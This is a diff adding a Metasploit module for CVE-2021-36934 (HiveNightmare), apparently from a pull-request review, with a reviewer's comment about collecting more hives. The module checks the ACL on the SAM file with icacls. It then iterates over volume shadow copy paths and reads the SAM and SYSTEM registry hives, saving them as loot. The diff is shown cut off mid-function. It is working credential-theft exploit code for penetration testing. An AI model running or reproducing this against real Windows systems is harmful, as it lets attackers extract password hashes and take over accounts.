modules/auxiliary/gather/hivenightmare_windows_sam_leak.rb

```diff
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    Rank = ExcellentRanking
+  
+    include Msf::Post::File
+    prepend Msf::Exploit::Remote::AutoCheck
+    include Msf::PostMixin
+  
+    def initialize(info = {})
+      super(
+        update_info(
+          info,
+          'Name' => 'HiveNighmare - SAM Leak',
+          'Description' => %q{
+              to do
+          },
+          'License' => MSF_LICENSE,
+          'Author' =>
+            [       
+              'romarroca',       # POC on www.github.com
+              'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+            ],
+          'References' =>
+            [
+              ['CVE', '2021-36934'],
+              ['URL', 'https://github.com/romarroca/SeriousSam']
+            ],
+          'DisclosureDate' => '2021-07-20',
+          'Notes' =>
+            {
+              'Stability' => [ CRASH_SAFE ],
+              'SideEffects' => [ IOC_IN_LOGS],
+              'Reliability' => [ REPEATABLE_SESSION ]
+            }
+        )
+      )
+      register_options([
+      OptString.new('USERS_GROUP_NAME', [true, 'Users group name depending on your language', 'Users']),
+      OptInt.new('NBRE_ITER', [true, 'Number of iterations on Shadow Copy file index', 10])
+        ])
+    end
+  
+    def check
+        acl = session.shell_command("icacls C:\\windows\\system32\\config\\sam")
+        if acl.include? "BUILTIN\\#{datastore['USERS_GROUP_NAME']}:(I)(RX)"
+            Exploit::CheckCode::Appears
+        else
+            Exploit::CheckCode::Safe
+        end
+    end
+  
+    def run
+      for i in 0..datastore['NBRE_ITER']
+        if session.shell_command("Test-Path -LiteralPath '\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{i}\\Windows\\System32\\config\\SAM'").include? "True"
+            print_good("SAM data found in HarddiskVolumeShadowCopy#{i} !")
+            
+            path = store_loot(
+              "windows.sam",
+              "",
+              session,
+              session.shell_command("Get-Content -Raw -LiteralPath '\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{i}\\Windows\\System32\\config\\SAM'")
+            )
+            print_good("SAM data saved at #{path}")
+
+            path = store_loot(
+              "windows.system",
+              "",
+              session,
+              session.shell_command("Get-Content -Raw -LiteralPath '\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{i}\\Windows\\System32\\config\\SYSTEM'")
+            )
+            print_good("SYSTEM data saved at #{path}")
+
+            print_good("SAM and SYSTEM data were leaked !")
+            return
```

Comment:
is there any value in retrieving additional hives rather than bailing out after the first one that is found?